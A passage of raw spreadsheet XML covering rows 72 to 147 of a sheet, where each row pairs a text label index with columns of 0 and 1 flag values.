        <v>71</v>
      </c>
      <c r="B72" s="1">
        <v>1</v>
      </c>
      <c r="C72" s="14">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N72" s="14">
        <v>0</v>
      </c>
      <c r="O72" s="14">
        <v>0</v>
      </c>
      <c r="P72" s="14">
        <v>0</v>
      </c>
      <c r="Q72" s="14">
        <v>0</v>
      </c>
      <c r="R72" s="14">
        <v>1</v>
      </c>
      <c r="S72" s="14">
        <v>0</v>
      </c>
      <c r="T72" s="7">
        <v>0</v>
      </c>
      <c r="U72" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="73" spans="1:21" ht="30">
      <c r="A73" s="3" t="s">
        <v>72</v>
      </c>
      <c r="B73" s="1">
        <v>1</v>
      </c>
      <c r="C73" s="1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1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7">
        <v>1</v>
      </c>
      <c r="U73" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="74" spans="1:21" ht="30">
      <c r="A74" s="3" t="s">
        <v>73</v>
      </c>
      <c r="B74" s="1">
        <v>1</v>
      </c>
      <c r="C74" s="14">
        <v>0</v>
      </c>
      <c r="D74" s="5">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U74" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="75" spans="1:21">
      <c r="A75" s="3" t="s">
        <v>74</v>
      </c>
      <c r="B75" s="1">
        <v>0</v>
      </c>
      <c r="C75" s="14">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U75" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="76" spans="1:21" ht="30">
      <c r="A76" s="3" t="s">
        <v>75</v>
      </c>
      <c r="B76" s="1">
        <v>1</v>
      </c>
      <c r="C76" s="1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1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7">
        <v>1</v>
      </c>
      <c r="U76" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="77" spans="1:21" ht="30">
      <c r="A77" s="3" t="s">
        <v>76</v>
      </c>
      <c r="B77" s="1">
        <v>1</v>
      </c>
      <c r="C77" s="1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1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7">
        <v>1</v>
      </c>
      <c r="U77" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="78" spans="1:21" ht="30">
      <c r="A78" s="3" t="s">
        <v>77</v>
      </c>
      <c r="B78" s="1">
        <v>0</v>
      </c>
      <c r="C78" s="14">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U78" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="79" spans="1:21" ht="90">
      <c r="A79" s="3" t="s">
        <v>78</v>
      </c>
      <c r="B79" s="1">
        <v>0</v>
      </c>
      <c r="C79" s="1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1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U79" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="80" spans="1:21" ht="30">
      <c r="A80" s="3" t="s">
        <v>79</v>
      </c>
      <c r="B80" s="1">
        <v>1</v>
      </c>
      <c r="C80" s="14">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N80" s="14">
        <v>0</v>
      </c>
      <c r="O80" s="14">
        <v>0</v>
      </c>
      <c r="P80" s="14">
        <v>1</v>
      </c>
      <c r="Q80" s="14">
        <v>0</v>
      </c>
      <c r="R80" s="14">
        <v>0</v>
      </c>
      <c r="S80" s="14">
        <v>0</v>
      </c>
      <c r="T80" s="7">
        <v>0</v>
      </c>
      <c r="U80" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="81" spans="1:21">
      <c r="A81" s="3" t="s">
        <v>80</v>
      </c>
      <c r="B81" s="1">
        <v>0</v>
      </c>
      <c r="C81" s="14">
        <v>0</v>
      </c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1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7">
        <v>0</v>
      </c>
      <c r="U81" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="82" spans="1:21">
      <c r="A82" s="3" t="s">
        <v>81</v>
      </c>
      <c r="B82" s="1">
        <v>1</v>
      </c>
      <c r="C82" s="14">
        <v>0</v>
      </c>
      <c r="D82" s="5">
        <v>0</v>
      </c>
      <c r="E82" s="5">
        <v>0</v>
      </c>
      <c r="F82" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U82" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="83" spans="1:21">
      <c r="A83" s="3" t="s">
        <v>82</v>
      </c>
      <c r="B83" s="1">
        <v>1</v>
      </c>
      <c r="C83" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U83" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="84" spans="1:21">
      <c r="A84" s="3" t="s">
        <v>83</v>
      </c>
      <c r="B84" s="1">
        <v>0</v>
      </c>
      <c r="C84" s="14">
        <v>0</v>
      </c>
      <c r="D84" s="5">
        <v>0</v>
      </c>
      <c r="E84" s="5">
        <v>1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1</v>
      </c>
      <c r="L84" s="5">
        <v>0</v>
      </c>
      <c r="M84" s="1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7">
        <v>0</v>
      </c>
      <c r="U84" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="85" spans="1:21" ht="30">
      <c r="A85" s="3" t="s">
        <v>84</v>
      </c>
      <c r="B85" s="1">
        <v>0</v>
      </c>
      <c r="C85" s="14">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U85" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="86" spans="1:21" ht="30">
      <c r="A86" s="3" t="s">
        <v>85</v>
      </c>
      <c r="B86" s="1">
        <v>1</v>
      </c>
      <c r="C86" s="14">
        <v>1</v>
      </c>
      <c r="D86" s="5">
        <v>0</v>
      </c>
      <c r="E86" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U86" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="87" spans="1:21" ht="30">
      <c r="A87" s="3" t="s">
        <v>86</v>
      </c>
      <c r="B87" s="1">
        <v>0</v>
      </c>
      <c r="C87" s="14">
        <v>0</v>
      </c>
      <c r="D87" s="5">
        <v>0</v>
      </c>
      <c r="E87" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U87" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="88" spans="1:21">
      <c r="A88" s="3" t="s">
        <v>87</v>
      </c>
      <c r="B88" s="1">
        <v>1</v>
      </c>
      <c r="C88" s="14">
        <v>0</v>
      </c>
      <c r="D88" s="5">
        <v>0</v>
      </c>
      <c r="E88" s="5">
        <v>0</v>
      </c>
      <c r="F88" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U88" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="89" spans="1:21" ht="30">
      <c r="A89" s="3" t="s">
        <v>88</v>
      </c>
      <c r="B89" s="1">
        <v>0</v>
      </c>
      <c r="C89" s="14">
        <v>0</v>
      </c>
      <c r="D89" s="5">
        <v>0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0</v>
      </c>
      <c r="M89" s="1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7">
        <v>0</v>
      </c>
      <c r="U89" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="90" spans="1:21" ht="60">
      <c r="A90" s="3" t="s">
        <v>89</v>
      </c>
      <c r="B90" s="1">
        <v>1</v>
      </c>
      <c r="C90" s="14">
        <v>1</v>
      </c>
      <c r="D90" s="5">
        <v>0</v>
      </c>
      <c r="E90" s="5">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N90" s="14">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U90" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="91" spans="1:21">
      <c r="A91" s="3" t="s">
        <v>90</v>
      </c>
      <c r="B91" s="1">
        <v>0</v>
      </c>
      <c r="C91" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U91" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="92" spans="1:21">
      <c r="A92" s="3" t="s">
        <v>91</v>
      </c>
      <c r="B92" s="1">
        <v>0</v>
      </c>
      <c r="C92" s="14">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U92" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="93" spans="1:21" ht="30">
      <c r="A93" s="3" t="s">
        <v>92</v>
      </c>
      <c r="B93" s="1">
        <v>1</v>
      </c>
      <c r="C93" s="1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1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7">
        <v>1</v>
      </c>
      <c r="U93" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="94" spans="1:21" ht="30">
      <c r="A94" s="3" t="s">
        <v>93</v>
      </c>
      <c r="B94" s="1">
        <v>1</v>
      </c>
      <c r="C94" s="14">
        <v>0</v>
      </c>
      <c r="D94" s="5">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U94" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="95" spans="1:21" ht="30">
      <c r="A95" s="3" t="s">
        <v>94</v>
      </c>
      <c r="B95" s="1">
        <v>1</v>
      </c>
      <c r="C95" s="14">
        <v>0</v>
      </c>
      <c r="D95" s="5">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U95" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="96" spans="1:21" ht="105">
      <c r="A96" s="3" t="s">
        <v>95</v>
      </c>
      <c r="B96" s="1">
        <v>0</v>
      </c>
      <c r="C96" s="1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1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U96" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="97" spans="1:21">
      <c r="A97" s="10" t="s">
        <v>96</v>
      </c>
      <c r="B97" s="1">
        <v>1</v>
      </c>
      <c r="C97" s="14">
        <v>0</v>
      </c>
      <c r="D97" s="5">
        <v>0</v>
      </c>
      <c r="E97" s="5">
        <v>1</v>
      </c>
      <c r="F97" s="5">
        <v>1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  <c r="M97" s="1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7">
        <v>0</v>
      </c>
      <c r="U97" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="98" spans="1:21" ht="30">
      <c r="A98" s="3" t="s">
        <v>97</v>
      </c>
      <c r="B98" s="1">
        <v>1</v>
      </c>
      <c r="C98" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U98" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="99" spans="1:21" ht="30">
      <c r="A99" s="3" t="s">
        <v>98</v>
      </c>
      <c r="B99" s="1">
        <v>0</v>
      </c>
      <c r="C99" s="14">
        <v>0</v>
      </c>
      <c r="D99" s="5">
        <v>0</v>
      </c>
      <c r="E99" s="5">
        <v>0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0</v>
      </c>
      <c r="M99" s="1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7">
        <v>0</v>
      </c>
      <c r="U99" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="100" spans="1:21" ht="30">
      <c r="A100" s="3" t="s">
        <v>99</v>
      </c>
      <c r="B100" s="1">
        <v>1</v>
      </c>
      <c r="C100" s="14">
        <v>0</v>
      </c>
      <c r="D100" s="5">
        <v>0</v>
      </c>
      <c r="E100" s="5">
        <v>0</v>
      </c>
      <c r="F100" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U100" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="101" spans="1:21" ht="30">
      <c r="A101" s="3" t="s">
        <v>100</v>
      </c>
      <c r="B101" s="1">
        <v>1</v>
      </c>
      <c r="C101" s="14">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U101" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="102" spans="1:21">
      <c r="A102" s="3" t="s">
        <v>101</v>
      </c>
      <c r="B102" s="1">
        <v>1</v>
      </c>
      <c r="C102" s="14">
        <v>0</v>
      </c>
      <c r="D102" s="5">
        <v>0</v>
      </c>
      <c r="E102" s="5">
        <v>0</v>
      </c>
      <c r="F102" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U102" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="103" spans="1:21" ht="30">
      <c r="A103" s="3" t="s">
        <v>102</v>
      </c>
      <c r="B103" s="1">
        <v>1</v>
      </c>
      <c r="C103" s="14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1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7">
        <v>1</v>
      </c>
      <c r="U103" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="104" spans="1:21" ht="30">
      <c r="A104" s="3" t="s">
        <v>103</v>
      </c>
      <c r="B104" s="1">
        <v>1</v>
      </c>
      <c r="C104" s="14">
        <v>0</v>
      </c>
      <c r="D104" s="5">
        <v>0</v>
      </c>
      <c r="E104" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U104" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="105" spans="1:21">
      <c r="A105" s="3" t="s">
        <v>104</v>
      </c>
      <c r="B105" s="1">
        <v>0</v>
      </c>
      <c r="C105" s="14">
        <v>0</v>
      </c>
      <c r="D105" s="5">
        <v>0</v>
      </c>
      <c r="E105" s="5">
        <v>0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M105" s="1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7">
        <v>0</v>
      </c>
      <c r="U105" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="106" spans="1:21" ht="30">
      <c r="A106" s="3" t="s">
        <v>105</v>
      </c>
      <c r="B106" s="1">
        <v>1</v>
      </c>
      <c r="C106" s="14">
        <v>0</v>
      </c>
      <c r="D106" s="5">
        <v>0</v>
      </c>
      <c r="E106" s="5">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U106" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="107" spans="1:21" ht="30">
      <c r="A107" s="3" t="s">
        <v>106</v>
      </c>
      <c r="B107" s="1">
        <v>1</v>
      </c>
      <c r="C107" s="14">
        <v>0</v>
      </c>
      <c r="D107" s="5">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U107" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="108" spans="1:21" ht="30">
      <c r="A108" s="3" t="s">
        <v>107</v>
      </c>
      <c r="B108" s="1">
        <v>0</v>
      </c>
      <c r="C108" s="14">
        <v>0</v>
      </c>
      <c r="D108" s="5">
        <v>0</v>
      </c>
      <c r="E108" s="5">
        <v>1</v>
      </c>
      <c r="F108" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U108" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="109" spans="1:21" ht="30">
      <c r="A109" s="3" t="s">
        <v>108</v>
      </c>
      <c r="B109" s="1">
        <v>1</v>
      </c>
      <c r="C109" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U109" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="110" spans="1:21" ht="105">
      <c r="A110" s="3" t="s">
        <v>109</v>
      </c>
      <c r="B110" s="1">
        <v>1</v>
      </c>
      <c r="C110" s="1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1</v>
      </c>
      <c r="M110" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U110" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="111" spans="1:21" ht="60">
      <c r="A111" s="3" t="s">
        <v>110</v>
      </c>
      <c r="B111" s="1">
        <v>0</v>
      </c>
      <c r="C111" s="14">
        <v>0</v>
      </c>
      <c r="D111" s="5">
        <v>0</v>
      </c>
      <c r="E111" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U111" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="112" spans="1:21" ht="30">
      <c r="A112" s="3" t="s">
        <v>111</v>
      </c>
      <c r="B112" s="1">
        <v>1</v>
      </c>
      <c r="C112" s="14">
        <v>0</v>
      </c>
      <c r="D112" s="5">
        <v>0</v>
      </c>
      <c r="E112" s="5">
        <v>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1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7">
        <v>1</v>
      </c>
      <c r="U112" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="113" spans="1:21" ht="60">
      <c r="A113" s="3" t="s">
        <v>112</v>
      </c>
      <c r="B113" s="1">
        <v>1</v>
      </c>
      <c r="C113" s="14">
        <v>1</v>
      </c>
      <c r="D113" s="5">
        <v>0</v>
      </c>
      <c r="E113" s="5">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N113" s="14">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U113" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="114" spans="1:21" ht="30">
      <c r="A114" s="3" t="s">
        <v>113</v>
      </c>
      <c r="B114" s="1">
        <v>1</v>
      </c>
      <c r="C114" s="14">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U114" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="115" spans="1:21" ht="30">
      <c r="A115" s="3" t="s">
        <v>114</v>
      </c>
      <c r="B115" s="1">
        <v>1</v>
      </c>
      <c r="C115" s="14">
        <v>0</v>
      </c>
      <c r="D115" s="5">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U115" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="116" spans="1:21">
      <c r="A116" s="3" t="s">
        <v>115</v>
      </c>
      <c r="B116" s="1">
        <v>1</v>
      </c>
      <c r="C116" s="1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  <c r="M116" s="1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7">
        <v>0</v>
      </c>
      <c r="U116" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="117" spans="1:21">
      <c r="A117" s="3" t="s">
        <v>116</v>
      </c>
      <c r="B117" s="1">
        <v>0</v>
      </c>
      <c r="C117" s="14">
        <v>0</v>
      </c>
      <c r="D117" s="5">
        <v>0</v>
      </c>
      <c r="E117" s="5">
        <v>1</v>
      </c>
      <c r="F117" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U117" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="118" spans="1:21" ht="30">
      <c r="A118" s="3" t="s">
        <v>117</v>
      </c>
      <c r="B118" s="1">
        <v>1</v>
      </c>
      <c r="C118" s="14">
        <v>0</v>
      </c>
      <c r="D118" s="5">
        <v>0</v>
      </c>
      <c r="E118" s="5">
        <v>1</v>
      </c>
      <c r="F118" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U118" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="119" spans="1:21" ht="30">
      <c r="A119" s="3" t="s">
        <v>118</v>
      </c>
      <c r="B119" s="1">
        <v>1</v>
      </c>
      <c r="C119" s="14">
        <v>0</v>
      </c>
      <c r="D119" s="5">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U119" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="120" spans="1:21" ht="30">
      <c r="A120" s="3" t="s">
        <v>119</v>
      </c>
      <c r="B120" s="1">
        <v>1</v>
      </c>
      <c r="C120" s="14">
        <v>1</v>
      </c>
      <c r="D120" s="5">
        <v>0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1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1</v>
      </c>
      <c r="T120" s="7">
        <v>0</v>
      </c>
      <c r="U120" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="121" spans="1:21">
      <c r="A121" s="3" t="s">
        <v>120</v>
      </c>
      <c r="B121" s="1">
        <v>1</v>
      </c>
      <c r="C121" s="14">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U121" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="122" spans="1:21" ht="30">
      <c r="A122" s="3" t="s">
        <v>121</v>
      </c>
      <c r="B122" s="1">
        <v>0</v>
      </c>
      <c r="C122" s="14">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U122" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="123" spans="1:21" ht="30">
      <c r="A123" s="3" t="s">
        <v>122</v>
      </c>
      <c r="B123" s="1">
        <v>1</v>
      </c>
      <c r="C123" s="14">
        <v>0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5">
        <v>0</v>
      </c>
      <c r="M123" s="1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7">
        <v>0</v>
      </c>
      <c r="U123" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="124" spans="1:21" ht="30">
      <c r="A124" s="3" t="s">
        <v>123</v>
      </c>
      <c r="B124" s="1">
        <v>1</v>
      </c>
      <c r="C124" s="14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1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7">
        <v>0</v>
      </c>
      <c r="U124" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="125" spans="1:21">
      <c r="A125" s="3" t="s">
        <v>124</v>
      </c>
      <c r="B125" s="1">
        <v>0</v>
      </c>
      <c r="C125" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U125" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="126" spans="1:21" ht="30">
      <c r="A126" s="3" t="s">
        <v>125</v>
      </c>
      <c r="B126" s="1">
        <v>1</v>
      </c>
      <c r="C126" s="14">
        <v>0</v>
      </c>
      <c r="D126" s="5">
        <v>0</v>
      </c>
      <c r="E126" s="5">
        <v>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1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7">
        <v>1</v>
      </c>
      <c r="U126" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="127" spans="1:21" ht="90">
      <c r="A127" s="3" t="s">
        <v>126</v>
      </c>
      <c r="B127" s="1">
        <v>0</v>
      </c>
      <c r="C127" s="1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</v>
      </c>
      <c r="M127" s="1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7">
        <v>0</v>
      </c>
      <c r="U127" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="128" spans="1:21" ht="30">
      <c r="A128" s="3" t="s">
        <v>127</v>
      </c>
      <c r="B128" s="1">
        <v>1</v>
      </c>
      <c r="C128" s="14">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U128" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="129" spans="1:21" ht="30">
      <c r="A129" s="3" t="s">
        <v>128</v>
      </c>
      <c r="B129" s="1">
        <v>1</v>
      </c>
      <c r="C129" s="14">
        <v>0</v>
      </c>
      <c r="D129" s="5">
        <v>0</v>
      </c>
      <c r="E129" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U129" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="130" spans="1:21">
      <c r="A130" s="3" t="s">
        <v>129</v>
      </c>
      <c r="B130" s="1">
        <v>0</v>
      </c>
      <c r="C130" s="14">
        <v>0</v>
      </c>
      <c r="D130" s="5">
        <v>0</v>
      </c>
      <c r="E130" s="5">
        <v>0</v>
      </c>
      <c r="F130" s="5">
        <v>1</v>
      </c>
      <c r="G130" s="5">
        <v>0</v>
      </c>
      <c r="H130" s="5">
        <v>0</v>
      </c>
      <c r="I130" s="5">
        <v>1</v>
      </c>
      <c r="J130" s="5">
        <v>0</v>
      </c>
      <c r="K130" s="5">
        <v>0</v>
      </c>
      <c r="L130" s="5">
        <v>0</v>
      </c>
      <c r="M130" s="1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7">
        <v>0</v>
      </c>
      <c r="U130" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="131" spans="1:21" ht="30">
      <c r="A131" s="3" t="s">
        <v>130</v>
      </c>
      <c r="B131" s="1">
        <v>0</v>
      </c>
      <c r="C131" s="14">
        <v>0</v>
      </c>
      <c r="D131" s="5">
        <v>0</v>
      </c>
      <c r="E131" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U131" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="132" spans="1:21" ht="45">
      <c r="A132" s="3" t="s">
        <v>131</v>
      </c>
      <c r="B132" s="1">
        <v>1</v>
      </c>
      <c r="C132" s="14">
        <v>1</v>
      </c>
      <c r="D132" s="5">
        <v>0</v>
      </c>
      <c r="E132" s="5">
        <v>1</v>
      </c>
      <c r="F132" s="5">
        <v>0</v>
      </c>
      <c r="G132" s="5">
        <v>0</v>
      </c>
      <c r="H132" s="5">
        <v>1</v>
      </c>
      <c r="I132" s="5">
        <v>0</v>
      </c>
      <c r="J132" s="5">
        <v>0</v>
      </c>
      <c r="K132" s="5">
        <v>0</v>
      </c>
      <c r="L132" s="5">
        <v>0</v>
      </c>
      <c r="M132" s="1">
        <v>0</v>
      </c>
      <c r="N132" s="14">
        <v>0</v>
      </c>
      <c r="O132" s="14">
        <v>0</v>
      </c>
      <c r="P132" s="14">
        <v>0</v>
      </c>
      <c r="Q132" s="14">
        <v>1</v>
      </c>
      <c r="R132" s="14">
        <v>0</v>
      </c>
      <c r="S132" s="14">
        <v>0</v>
      </c>
      <c r="T132" s="7">
        <v>0</v>
      </c>
      <c r="U132" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="133" spans="1:21" ht="30">
      <c r="A133" s="3" t="s">
        <v>132</v>
      </c>
      <c r="B133" s="1">
        <v>1</v>
      </c>
      <c r="C133" s="14">
        <v>0</v>
      </c>
      <c r="D133" s="5">
        <v>0</v>
      </c>
      <c r="E133" s="5">
        <v>0</v>
      </c>
      <c r="F133" s="5">
        <v>1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L133" s="5">
        <v>0</v>
      </c>
      <c r="M133" s="1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7">
        <v>0</v>
      </c>
      <c r="U133" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="134" spans="1:21">
      <c r="A134" s="3" t="s">
        <v>133</v>
      </c>
      <c r="B134" s="1">
        <v>1</v>
      </c>
      <c r="C134" s="14">
        <v>0</v>
      </c>
      <c r="D134" s="5">
        <v>0</v>
      </c>
      <c r="E134" s="5">
        <v>0</v>
      </c>
      <c r="F134" s="5">
        <v>1</v>
      </c>
      <c r="G134" s="5">
        <v>0</v>
      </c>
      <c r="H134" s="5">
        <v>1</v>
      </c>
      <c r="I134" s="5">
        <v>0</v>
      </c>
      <c r="J134" s="5">
        <v>0</v>
      </c>
      <c r="K134" s="5">
        <v>0</v>
      </c>
      <c r="L134" s="5">
        <v>0</v>
      </c>
      <c r="M134" s="1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7">
        <v>0</v>
      </c>
      <c r="U134" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="135" spans="1:21" ht="30">
      <c r="A135" s="3" t="s">
        <v>134</v>
      </c>
      <c r="B135" s="1">
        <v>0</v>
      </c>
      <c r="C135" s="14">
        <v>0</v>
      </c>
      <c r="D135" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U135" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="136" spans="1:21">
      <c r="A136" s="3" t="s">
        <v>135</v>
      </c>
      <c r="B136" s="1">
        <v>1</v>
      </c>
      <c r="C136" s="14">
        <v>0</v>
      </c>
      <c r="D136" s="5">
        <v>0</v>
      </c>
      <c r="E136" s="5">
        <v>0</v>
      </c>
      <c r="F136" s="5">
        <v>1</v>
      </c>
      <c r="G136" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U136" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="137" spans="1:21" ht="30">
      <c r="A137" s="3" t="s">
        <v>136</v>
      </c>
      <c r="B137" s="1">
        <v>0</v>
      </c>
      <c r="C137" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U137" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="138" spans="1:21" ht="30">
      <c r="A138" s="3" t="s">
        <v>137</v>
      </c>
      <c r="B138" s="1">
        <v>1</v>
      </c>
      <c r="C138" s="14">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U138" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="139" spans="1:21">
      <c r="A139" s="3" t="s">
        <v>138</v>
      </c>
      <c r="B139" s="1">
        <v>0</v>
      </c>
      <c r="C139" s="14">
        <v>0</v>
      </c>
      <c r="D139" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U139" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="140" spans="1:21" ht="60">
      <c r="A140" s="3" t="s">
        <v>139</v>
      </c>
      <c r="B140" s="1">
        <v>1</v>
      </c>
      <c r="C140" s="14">
        <v>1</v>
      </c>
      <c r="D140" s="5">
        <v>0</v>
      </c>
      <c r="E140" s="5">
        <v>1</v>
      </c>
      <c r="F140" s="5">
        <v>0</v>
      </c>
      <c r="G140" s="5">
        <v>0</v>
      </c>
      <c r="H140" s="5">
        <v>1</v>
      </c>
      <c r="I140" s="5">
        <v>0</v>
      </c>
      <c r="J140" s="5">
        <v>0</v>
      </c>
      <c r="K140" s="5">
        <v>0</v>
      </c>
      <c r="L140" s="5">
        <v>0</v>
      </c>
      <c r="M140" s="1">
        <v>0</v>
      </c>
      <c r="N140" s="14">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U140" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="141" spans="1:21" ht="30">
      <c r="A141" s="3" t="s">
        <v>140</v>
      </c>
      <c r="B141" s="1">
        <v>1</v>
      </c>
      <c r="C141" s="1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1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7">
        <v>1</v>
      </c>
      <c r="U141" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="142" spans="1:21" ht="45">
      <c r="A142" s="3" t="s">
        <v>141</v>
      </c>
      <c r="B142" s="1">
        <v>1</v>
      </c>
      <c r="C142" s="14">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U142" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="143" spans="1:21" ht="30">
      <c r="A143" s="3" t="s">
        <v>142</v>
      </c>
      <c r="B143" s="1">
        <v>1</v>
      </c>
      <c r="C143" s="1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1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7">
        <v>1</v>
      </c>
      <c r="U143" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="144" spans="1:21" ht="30">
      <c r="A144" s="3" t="s">
        <v>143</v>
      </c>
      <c r="B144" s="1">
        <v>0</v>
      </c>
      <c r="C144" s="14">
        <v>0</v>
      </c>
      <c r="D144" s="5">
        <v>0</v>
      </c>
      <c r="E144" s="5">
        <v>1</v>
      </c>
      <c r="F144" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U144" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="145" spans="1:21" ht="30">
      <c r="A145" s="3" t="s">
        <v>144</v>
      </c>
      <c r="B145" s="1">
        <v>0</v>
      </c>
      <c r="C145" s="14">
        <v>0</v>
      </c>
      <c r="D145" s="5">
        <v>0</v>
      </c>
      <c r="E145" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U145" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="146" spans="1:21" ht="45">
      <c r="A146" s="3" t="s">
        <v>145</v>
      </c>
      <c r="B146" s="1">
        <v>1</v>
      </c>
      <c r="C146" s="14">
        <v>0</v>
      </c>
      <c r="D146" s="5">
        <v>0</v>
      </c>
      <c r="E146" s="5">
        <v>0</v>
      </c>
      <c r="F146" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U146" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="147" spans="1:21">
      <c r="A147" s="3" t="s">
        <v>146</v>
      </c>
      <c r="B147" s="1">
        <v>0</v>
      </c>
      <c r="C147" s="14">
        <v>0</v>
      </c>
      <c r="D147" s="5">
